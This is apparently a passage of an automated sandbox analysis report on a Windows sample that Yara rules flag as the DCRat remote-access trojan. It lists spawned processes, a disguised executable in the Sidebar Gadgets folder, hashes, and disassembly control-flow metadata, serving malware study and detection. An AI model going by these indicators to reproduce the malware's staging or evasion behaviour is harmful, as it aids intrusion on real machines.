                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:12
                                                                                                                                                                  Start time:03:06:58
                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:13
                                                                                                                                                                  Start time:03:06:59
                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\chcp.com
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:chcp 65001
                                                                                                                                                                  Imagebase:0x7ff60e5e0000
                                                                                                                                                                  File size:14'848 bytes
                                                                                                                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:14
                                                                                                                                                                  Start time:03:06:59
                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:ping -n 10 localhost
                                                                                                                                                                  Imagebase:0x7ff786a20000
                                                                                                                                                                  File size:22'528 bytes
                                                                                                                                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:15
                                                                                                                                                                  Start time:03:07:04
                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                  Imagebase:0x7ff693ab0000
                                                                                                                                                                  File size:496'640 bytes
                                                                                                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:16
                                                                                                                                                                  Start time:03:07:08
                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                  Path:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Program Files (x86)\windows sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe"
                                                                                                                                                                  Imagebase:0x820000
                                                                                                                                                                  File size:2'615'296 bytes
                                                                                                                                                                  MD5 hash:CDAC978772A7616686C0EFE2727CE902
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Yara matches:
                                                                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000010.00000002.2909009031.000000000308A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000010.00000002.2909009031.00000000033A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000010.00000002.2909009031.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                  • Detection: 78%, ReversingLabs
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:19
                                                                                                                                                                  Start time:03:07:14
                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  Disassembly

                                                                                                                                                                  Reset < >

                                                                                                                                                                    Execution Graph

                                                                                                                                                                    Execution Coverage:12.1%
                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                    Signature Coverage:6.9%
                                                                                                                                                                    Total number of Nodes:29
                                                                                                                                                                    Total number of Limit Nodes:0
                                                                                                                                                                    execution_graph 23353 7ffd9b8bf0f5 23354 7ffd9b8bf11f VirtualAlloc 23353->23354 23356 7ffd9b8bf23f 23354->23356 23357 7ffd9b8bd2f5 23358 7ffd9b8bd36b WriteFile 23357->23358 23360 7ffd9b8bd48f 23358->23360 23370 7ffd9b8bd04a 23371 7ffd9b8bd059 CreateFileTransactedW 23370->23371 23373 7ffd9b8bd268 23371->23373 23378 7ffd9b8bb57d 23379 7ffd9b9216a0 23378->23379 23382 7ffd9b9207d0 23379->23382 23381 7ffd9b921789 23386 7ffd9b9207db 23382->23386 23383 7ffd9b92087e ResumeThread 23385 7ffd9b9209b4 23383->23385 23385->23381 23386->23383 23388 7ffd9b920897 23386->23388 23389 7ffd9b9208a2 ResumeThread 23388->23389 23391 7ffd9b9209b4 23389->23391 23391->23383 23361 7ffd9b8be6e1 23365 7ffd9b8be6eb 23361->23365 23362 7ffd9b8be815 23368 7ffd9b8bec5a GetSystemInfo 23362->23368 23364 7ffd9b8be822 23369 7ffd9b8bec5a GetSystemInfo 23364->23369 23365->23362 23365->23364 23367 7ffd9b8be820 23368->23367 23369->23367 23374 7ffd9b8bec91 23375 7ffd9b8bec9e GetSystemInfo 23374->23375 23377 7ffd9b8bed85 23375->23377

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    Function 00007FFD9B8B1EC3 Relevance: 16.5, Strings: 12, Instructions: 1537COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 0 7ffd9b8b1ec3-7ffd9b8b1f16 3 7ffd9b8b2285-7ffd9b8b22a9 0->3 4 7ffd9b8b1f1c-7ffd9b8b1f42 0->4 7 7ffd9b8b22ab-7ffd9b8b230c 3->7 8 7ffd9b8b2311-7ffd9b8b231c 3->8 9 7ffd9b8b1f59-7ffd9b8b1fa8 4->9 10 7ffd9b8b1f44-7ffd9b8b1f54 4->10 12 7ffd9b8b3267-7ffd9b8b32d4 7->12 15 7ffd9b8b231f-7ffd9b8b2371 8->15 16 7ffd9b8b231e 8->16 23 7ffd9b8b2218-7ffd9b8b224d 9->23 10->12 24 7ffd9b8b23dc-7ffd9b8b2406 15->24 25 7ffd9b8b2373-7ffd9b8b23d7 15->25 16->15 29 7ffd9b8b1fad-7ffd9b8b1fcc 23->29 30 7ffd9b8b2253-7ffd9b8b2265 23->30 31 7ffd9b8b2418-7ffd9b8b2446 24->31 32 7ffd9b8b2408-7ffd9b8b2413 24->32 25->12 36 7ffd9b8b2006-7ffd9b8b2008 29->36 37 7ffd9b8b1fce-7ffd9b8b2004 29->37 33 7ffd9b8b226a-7ffd9b8b2280 30->33 41 7ffd9b8b244c-7ffd9b8b2477 31->41 42 7ffd9b8b24fd-7ffd9b8b2521 31->42 32->12 33->12 40 7ffd9b8b200e-7ffd9b8b201e 36->40 37->40 44 7ffd9b8b21ce-7ffd9b8b220f 40->44 45 7ffd9b8b2024-7ffd9b8b207f 40->45 48 7ffd9b8b2479-7ffd9b8b24cd 41->48 49 7ffd9b8b24d0-7ffd9b8b24f8 41->49 52 7ffd9b8b2527-7ffd9b8b256e 42->52 53 7ffd9b8b274e-7ffd9b8b2773 42->53 62 7ffd9b8b2210-7ffd9b8b2215 44->62 63 7ffd9b8b20d3-7ffd9b8b20f3 45->63 64 7ffd9b8b2081-7ffd9b8b20ce 45->64 48->49 49->12 69 7ffd9b8b25c0 52->69 70 7ffd9b8b2570-7ffd9b8b25be 52->70 60 7ffd9b8b2775-7ffd9b8b27e2 53->60 61 7ffd9b8b27e4-7ffd9b8b27e6 53->61 67 7ffd9b8b27ec-7ffd9b8b27fc 60->67 61->67 62->23 76 7ffd9b8b20f5-7ffd9b8b212c 63->76 77 7ffd9b8b212e-7ffd9b8b2130 63->77 64->62 73 7ffd9b8b2b46-7ffd9b8b2b6b 67->73 74 7ffd9b8b2802-7ffd9b8b282c 67->74 78 7ffd9b8b25ca-7ffd9b8b25da 69->78 70->78 88 7ffd9b8b2bdc-7ffd9b8b2bde 73->88 89 7ffd9b8b2b6d-7ffd9b8b2bda 73->89 86 7ffd9b8b282e 74->86 87 7ffd9b8b2833-7ffd9b8b285d 74->87 84 7ffd9b8b2136-7ffd9b8b2146 76->84 77->84 82 7ffd9b8b25eb-7ffd9b8b2658 call 7ffd9b8b06d0 78->82 83 7ffd9b8b25dc-7ffd9b8b25e6 78->83 122 7ffd9b8b26ca-7ffd9b8b2700 82->122 83->12 93 7ffd9b8b214c-7ffd9b8b21a1 84->93 94 7ffd9b8b21cd 84->94 86->87 105 7ffd9b8b28af 87->105 106 7ffd9b8b285f-7ffd9b8b28ad 87->106 95 7ffd9b8b2be4-7ffd9b8b2bfa 88->95 89->95 112 7ffd9b8b21cc 93->112 113 7ffd9b8b21a3-7ffd9b8b21ca 93->113 94->44 98 7ffd9b8b3119-7ffd9b8b317f 95->98 99 7ffd9b8b2c00-7ffd9b8b2c39 95->99 133 7ffd9b8b31a6-7ffd9b8b31c3 98->133 134 7ffd9b8b3181-7ffd9b8b31a1 call 7ffd9b8b06e0 98->134 115 7ffd9b8b2c3b 99->115 116 7ffd9b8b2c40-7ffd9b8b2c5f 99->116 110 7ffd9b8b28b9-7ffd9b8b28c9 105->110 106->110 118 7ffd9b8b28cb-7ffd9b8b28d5 110->118 119 7ffd9b8b28da-7ffd9b8b28de call 7ffd9b8b06d0 110->119 112->94 113->62 115->116 123 7ffd9b8b2c66-7ffd9b8b2cdf 116->123 124 7ffd9b8b2c61 116->124 118->12 131 7ffd9b8b28e3-7ffd9b8b2a3a 119->131 137 7ffd9b8b2706-7ffd9b8b2749 122->137 138 7ffd9b8b265a-7ffd9b8b26c7 call 7ffd9b8b06d8 122->138 152 7ffd9b8b2cf0-7ffd9b8b2d0d 123->152 153 7ffd9b8b2ce1-7ffd9b8b2ceb 123->153 124->123 190 7ffd9b8b2abc-7ffd9b8b2af8 131->190 146 7ffd9b8b3215-7ffd9b8b3217 133->146 147 7ffd9b8b31c5-7ffd9b8b3213 133->147 134->12 137->12 138->122 149 7ffd9b8b321d-7ffd9b8b3233 146->149 147->149 154 7ffd9b8b3235-7ffd9b8b3259 call 7ffd9b8b06f0 149->154 155 7ffd9b8b325b-7ffd9b8b3265 149->155 163 7ffd9b8b2d5f 152->163 164 7ffd9b8b2d0f-7ffd9b8b2d5d 152->164 153->12 154->12 155->12 168 7ffd9b8b2d69-7ffd9b8b2d7f 163->168 164->168 171 7ffd9b8b2d90-7ffd9b8b2df1 call 7ffd9b8b06d0 168->171 172 7ffd9b8b2d81-7ffd9b8b2d8b 168->172 179 7ffd9b8b2df3-7ffd9b8b2dfd 171->179 180 7ffd9b8b2e02-7ffd9b8b2e80 171->180 172->12 179->12 193 7ffd9b8b2e87-7ffd9b8b2f56 180->193 194 7ffd9b8b2a3f-7ffd9b8b2ab9 call 7ffd9b8b06d8 190->194 195 7ffd9b8b2afe-7ffd9b8b2b41 190->195 210 7ffd9b8b30c0-7ffd9b8b30ff 193->210 194->190 195->12 212 7ffd9b8b3105-7ffd9b8b3114 210->212 213 7ffd9b8b2f5b-7ffd9b8b2fa5 210->213 212->12 216 7ffd9b8b2fa7-7ffd9b8b2fa8 213->216 217 7ffd9b8b2fad-7ffd9b8b30b0 call 7ffd9b8b06d8 213->217 218 7ffd9b8b30b1-7ffd9b8b30ba 216->218 217->218 218->210
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1763457876.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b8b0000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: "$H$[$[$\$]$]$u${${$}$}
                                                                                                                                                                    • API String ID: 0-2063274034
                                                                                                                                                                    • Opcode ID: aa414e87f64567a571f846941d0bd65914e474bd866363aac04102d97b25de2b
                                                                                                                                                                    • Instruction ID: 5dac4abfeba3a874b3f44ceb329917888fb448390472eb67376bff8fbc3e7db2
                                                                                                                                                                    • Opcode Fuzzy Hash: aa414e87f64567a571f846941d0bd65914e474bd866363aac04102d97b25de2b
                                                                                                                                                                    • Instruction Fuzzy Hash: E7D2B670E1962D8FDBA8DF68C894BA9B7B1FF59301F5041EAD01DE3295DA346A81CF40
                                                                                                                                                                    Function 00007FFD9B8BEC5A Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1763457876.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b8b0000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InfoSystem
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 31276548-0
                                                                                                                                                                    • Opcode ID: 389d9964bf8d5eccbbfd88e9319b968a403f833b7487caa47ae82a1af16f002b
                                                                                                                                                                    • Instruction ID: fbee95f86c37fd651c2c666f1000245a0333fafa73a1c90cef00167bf0fef293
                                                                                                                                                                    • Opcode Fuzzy Hash: 389d9964bf8d5eccbbfd88e9319b968a403f833b7487caa47ae82a1af16f002b
                                                                                                                                                                    • Instruction Fuzzy Hash: 7D51E33090DA5C8FDB99DFA8D859AE9BBF0FF59310F0041ABD04DD72A2DA346946CB40
                                                                                                                                                                    Function 00007FFD9B8C3415 Relevance: .7, Instructions: 702COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1763457876.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b8b0000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 54f40d5dd1bb9bb1feaec052e3ea4ba73b4f1ef77ab57c36dc3cc984783b8137
                                                                                                                                                                    • Instruction ID: 62bf92cbdd1f793350b4d21a1ad52cbec7ea785787401bb2aa2db073aee4b1bf
                                                                                                                                                                    • Opcode Fuzzy Hash: 54f40d5dd1bb9bb1feaec052e3ea4ba73b4f1ef77ab57c36dc3cc984783b8137
                                                                                                                                                                    • Instruction Fuzzy Hash: 45525970A1961D8FDB68DF54C4A0BF977B2FF58304F5041ADD05EAB292CB38AA46DB40
                                                                                                                                                                    Function 00007FFD9BA8C100 Relevance: 1.9, Strings: 1, Instructions: 690COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1359 7ffd9ba8c100-7ffd9ba8c11a 1360 7ffd9ba8c71c-7ffd9ba8c72a 1359->1360 1361 7ffd9ba8c120-7ffd9ba8c130 1359->1361 1362 7ffd9ba8c72c-7ffd9ba8c730 1360->1362 1363 7ffd9ba8c731-7ffd9ba8c740 1360->1363 1364 7ffd9ba8c136-7ffd9ba8c171 1361->1364 1365 7ffd9ba8c77a-7ffd9ba8c790 1361->1365 1362->1363 1371 7ffd9ba8c20a-7ffd9ba8c212 1364->1371 1369 7ffd9ba8c7da-7ffd9ba8c7ed 1365->1369 1370 7ffd9ba8c792-7ffd9ba8c7b6 1365->1370 1372 7ffd9ba8c176-7ffd9ba8c17f 1371->1372 1373 7ffd9ba8c218 1371->1373 1372->1365 1375 7ffd9ba8c185-7ffd9ba8c190 1372->1375 1374 7ffd9ba8c222-7ffd9ba8c23f 1373->1374 1378 7ffd9ba8c246-7ffd9ba8c257 1374->1378 1376 7ffd9ba8c196-7ffd9ba8c1aa 1375->1376 1377 7ffd9ba8c21a-7ffd9ba8c21e 1375->1377 1379 7ffd9ba8c1ac-7ffd9ba8c1c3 1376->1379 1380 7ffd9ba8c203-7ffd9ba8c207 1376->1380 1377->1374 1386 7ffd9ba8c259-7ffd9ba8c26e 1378->1386 1387 7ffd9ba8c270-7ffd9ba8c27f 1378->1387 1379->1365 1381 7ffd9ba8c1c9-7ffd9ba8c1d5 1379->1381 1380->1371 1382 7ffd9ba8c1d7-7ffd9ba8c1eb 1381->1382 1383 7ffd9ba8c1ef-7ffd9ba8c200 1381->1383 1382->1379 1385 7ffd9ba8c1ed 1382->1385 1383->1380 1385->1380 1386->1387 1391 7ffd9ba8c2a1-7ffd9ba8c2a8 1387->1391 1392 7ffd9ba8c281-7ffd9ba8c29c 1387->1392 1394 7ffd9ba8c2ae-7ffd9ba8c30e 1391->1394 1398 7ffd9ba8c6d9-7ffd9ba8c6f9 1392->1398 1400 7ffd9ba8c35f-7ffd9ba8c3a6 1394->1400 1401 7ffd9ba8c310-7ffd9ba8c323 1394->1401 1405 7ffd9ba8c6fd-7ffd9ba8c70a 1398->1405 1411 7ffd9ba8c3aa-7ffd9ba8c3b0 1400->1411 1401->1365 1403 7ffd9ba8c329-7ffd9ba8c357 1401->1403 1412 7ffd9ba8c358-7ffd9ba8c35d 1403->1412 1407 7ffd9ba8c70c-7ffd9ba8c716 1405->1407 1407->1361 1409 7ffd9ba8c71b 1407->1409 1409->1360 1414 7ffd9ba8c3ba-7ffd9ba8c3cb 1411->1414 1412->1401 1413 7ffd9ba8c35e 1412->1413 1413->1400 1415 7ffd9ba8c43c-7ffd9ba8c44d 1414->1415 1416 7ffd9ba8c3cd-7ffd9ba8c3d1 1414->1416 1418 7ffd9ba8c44e-7ffd9ba8c451 1415->1418 1416->1412 1419 7ffd9ba8c3d3 1416->1419 1421 7ffd9ba8c457-7ffd9ba8c45b 1418->1421 1420 7ffd9ba8c3fc-7ffd9ba8c40d 1419->1420 1420->1421 1428 7ffd9ba8c40f-7ffd9ba8c41d 1420->1428 1422 7ffd9ba8c45d-7ffd9ba8c45f 1421->1422 1424 7ffd9ba8c4a9-7ffd9ba8c4b1 1422->1424 1425 7ffd9ba8c461-7ffd9ba8c46f 1422->1425 1429 7ffd9ba8c4fb-7ffd9ba8c503 1424->1429 1430 7ffd9ba8c4b3-7ffd9ba8c4bc 1424->1430 1426 7ffd9ba8c4e0-7ffd9ba8c4f5 1425->1426 1427 7ffd9ba8c471-7ffd9ba8c475 1425->1427 1426->1429 1427->1420 1437 7ffd9ba8c477 1427->1437 1434 7ffd9ba8c48e-7ffd9ba8c4a3 1428->1434 1435 7ffd9ba8c41f-7ffd9ba8c423 1428->1435 1432 7ffd9ba8c509-7ffd9ba8c522 1429->1432 1433 7ffd9ba8c58b-7ffd9ba8c599 1429->1433 1436 7ffd9ba8c4bf-7ffd9ba8c4c1 1430->1436 1432->1433 1438 7ffd9ba8c524-7ffd9ba8c525 1432->1438 1439 7ffd9ba8c60a-7ffd9ba8c60b 1433->1439 1440 7ffd9ba8c59b-7ffd9ba8c59d 1433->1440 1434->1424 1435->1411 1449 7ffd9ba8c425 1435->1449 1442 7ffd9ba8c532-7ffd9ba8c534 1436->1442 1443 7ffd9ba8c4c3-7ffd9ba8c4c5 1436->1443 1437->1434 1445 7ffd9ba8c526-7ffd9ba8c531 1438->1445 1444 7ffd9ba8c63b-7ffd9ba8c63d 1439->1444 1446 7ffd9ba8c619-7ffd9ba8c61b 1440->1446 1447 7ffd9ba8c59f 1440->1447 1456 7ffd9ba8c535-7ffd9ba8c537 1442->1456 1450 7ffd9ba8c4c7 1443->1450 1451 7ffd9ba8c541-7ffd9ba8c545 1443->1451 1460 7ffd9ba8c6ae-7ffd9ba8c6d7 1444->1460 1461 7ffd9ba8c63f 1444->1461 1445->1442 1452 7ffd9ba8c5ad 1445->1452 1453 7ffd9ba8c68c 1446->1453 1454 7ffd9ba8c61d-7ffd9ba8c61f 1446->1454 1447->1445 1455 7ffd9ba8c5a1 1447->1455 1449->1415 1450->1418 1457 7ffd9ba8c4c9 1450->1457 1458 7ffd9ba8c547 1451->1458 1459 7ffd9ba8c5c1-7ffd9ba8c5db 1451->1459 1466 7ffd9ba8c62e 1452->1466 1467 7ffd9ba8c5ae 1452->1467 1453->1405 1462 7ffd9ba8c68e-7ffd9ba8c690 1453->1462 1463 7ffd9ba8c69b-7ffd9ba8c69f 1454->1463 1464 7ffd9ba8c621 1454->1464 1465 7ffd9ba8c5a8-7ffd9ba8c5ac 1455->1465 1478 7ffd9ba8c5b8-7ffd9ba8c5c0 1456->1478 1479 7ffd9ba8c538 1456->1479 1469 7ffd9ba8c4ce-7ffd9ba8c4d4 1457->1469 1458->1469 1470 7ffd9ba8c549 1458->1470 1490 7ffd9ba8c60d-7ffd9ba8c616 1459->1490 1491 7ffd9ba8c5dd-7ffd9ba8c5eb 1459->1491 1460->1398 1471 7ffd9ba8c65c-7ffd9ba8c66a 1461->1471 1462->1407 1473 7ffd9ba8c692 1462->1473 1463->1409 1476 7ffd9ba8c6a1 1463->1476 1464->1465 1474 7ffd9ba8c623 1464->1474 1465->1452 1475 7ffd9ba8c628-7ffd9ba8c62c 1465->1475 1480 7ffd9ba8c6aa-7ffd9ba8c6ad 1466->1480 1481 7ffd9ba8c630 1466->1481 1467->1456 1477 7ffd9ba8c5af-7ffd9ba8c5b0 1467->1477 1484 7ffd9ba8c550-7ffd9ba8c575 1469->1484 1489 7ffd9ba8c4d6 1469->1489 1470->1484 1472 7ffd9ba8c66b-7ffd9ba8c675 1471->1472 1486 7ffd9ba8c677-7ffd9ba8c68a 1472->1486 1473->1446 1487 7ffd9ba8c694 1473->1487 1474->1475 1475->1466 1476->1475 1488 7ffd9ba8c6a3 1476->1488 1477->1478 1478->1459 1479->1436 1493 7ffd9ba8c539-7ffd9ba8c53a 1479->1493 1480->1460 1481->1486 1494 7ffd9ba8c632-7ffd9ba8c63a 1481->1494 1499 7ffd9ba8c578-7ffd9ba8c589 1484->1499 1486->1453 1487->1463 1488->1480 1489->1422 1497 7ffd9ba8c4d8 1489->1497 1490->1446 1491->1471 1498 7ffd9ba8c5ed-7ffd9ba8c5ef 1491->1498 1493->1451 1494->1444 1497->1426 1498->1472 1501 7ffd9ba8c5f1 1498->1501 1499->1433 1499->1438 1501->1499 1502 7ffd9ba8c5f3 1501->1502 1502->1439
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: a._L
                                                                                                                                                                    • API String ID: 0-3527698608
                                                                                                                                                                    • Opcode ID: 8915683208598b740e3eba4c31cb420280605d94c1515b7b2e6d9f49d53ec3c9
                                                                                                                                                                    • Instruction ID: eed451c1d92e142d5ac76885440087efd5f2ed7e809f186915eeaece19450b5f
                                                                                                                                                                    • Opcode Fuzzy Hash: 8915683208598b740e3eba4c31cb420280605d94c1515b7b2e6d9f49d53ec3c9
                                                                                                                                                                    • Instruction Fuzzy Hash: A4329430B19A1D8FDBA8DB58C8A5A7977E1FF54310F1141B9D00EC76A6EA78AD41CF80
                                                                                                                                                                    Function 00007FFD9B8BD04A Relevance: 1.8, APIs: 1, Instructions: 293COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1618 7ffd9b8bd04a-7ffd9b8bd057 1619 7ffd9b8bd059-7ffd9b8bd061 1618->1619 1620 7ffd9b8bd062-7ffd9b8bd128 1618->1620 1619->1620 1624 7ffd9b8bd12a-7ffd9b8bd141 1620->1624 1625 7ffd9b8bd144-7ffd9b8bd266 CreateFileTransactedW 1620->1625 1624->1625 1626 7ffd9b8bd268 1625->1626 1627 7ffd9b8bd26e-7ffd9b8bd2f0 1625->1627 1626->1627
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1763457876.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b8b0000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateFileTransacted
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2149338676-0
                                                                                                                                                                    • Opcode ID: 8d66c9155691f047349d15598143e216cf3ce13585badbd526f14493f1d5bb0b
                                                                                                                                                                    • Instruction ID: 114135b5513c7c00faa3b41a102d116ae6c10045279a8b8df99d220d9d907cf7
                                                                                                                                                                    • Opcode Fuzzy Hash: 8d66c9155691f047349d15598143e216cf3ce13585badbd526f14493f1d5bb0b
                                                                                                                                                                    • Instruction Fuzzy Hash: F9913130908A5D8FDB99DF58C894BA9BBF1FB6A310F1001AED04DE3291DB75A984CF44
                                                                                                                                                                    Function 00007FFD9B9207D0 Relevance: 1.8, APIs: 1, Instructions: 251COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1717 7ffd9b9207d0-7ffd9b9207d9 1718 7ffd9b920823-7ffd9b920826 1717->1718 1719 7ffd9b9207db-7ffd9b920804 1717->1719 1720 7ffd9b920828-7ffd9b920830 1718->1720 1721 7ffd9b9208a7-7ffd9b9208dd 1718->1721 1722 7ffd9b920806 1719->1722 1723 7ffd9b92080b-7ffd9b920820 1719->1723 1725 7ffd9b920835-7ffd9b920871 call 7ffd9b8bd860 call 7ffd9b8bd850 1720->1725 1726 7ffd9b9208e0-7ffd9b9209b2 ResumeThread 1721->1726 1727 7ffd9b9208df 1721->1727 1722->1723 1730 7ffd9b920822 1723->1730 1731 7ffd9b920891-7ffd9b920895 1723->1731 1744 7ffd9b920873-7ffd9b920879 call 7ffd9b920897 1725->1744 1740 7ffd9b9209b4 1726->1740 1741 7ffd9b9209ba-7ffd9b920a04 1726->1741 1727->1726 1730->1718 1731->1721 1740->1741 1748 7ffd9b92087e-7ffd9b920890 1744->1748 1748->1731
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1763457876.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b8b0000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: fbda4a75c93eddc2b017be4f5d08d8fdb3d722782436000c7954ffd970e2a439
                                                                                                                                                                    • Instruction ID: 279f9e2dc3619a9165269f70a0e1e1d32ee8ea973d2d924c4f91dbcfd3fe76db
                                                                                                                                                                    • Opcode Fuzzy Hash: fbda4a75c93eddc2b017be4f5d08d8fdb3d722782436000c7954ffd970e2a439
                                                                                                                                                                    • Instruction Fuzzy Hash: 9381BF30E0965C8FDB58EFA8D855AEDBBB0FF55311F10017AD04DDB2A2DA356946CB80
                                                                                                                                                                    Function 00007FFD9B8BD2F5 Relevance: 1.7, APIs: 1, Instructions: 216fileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
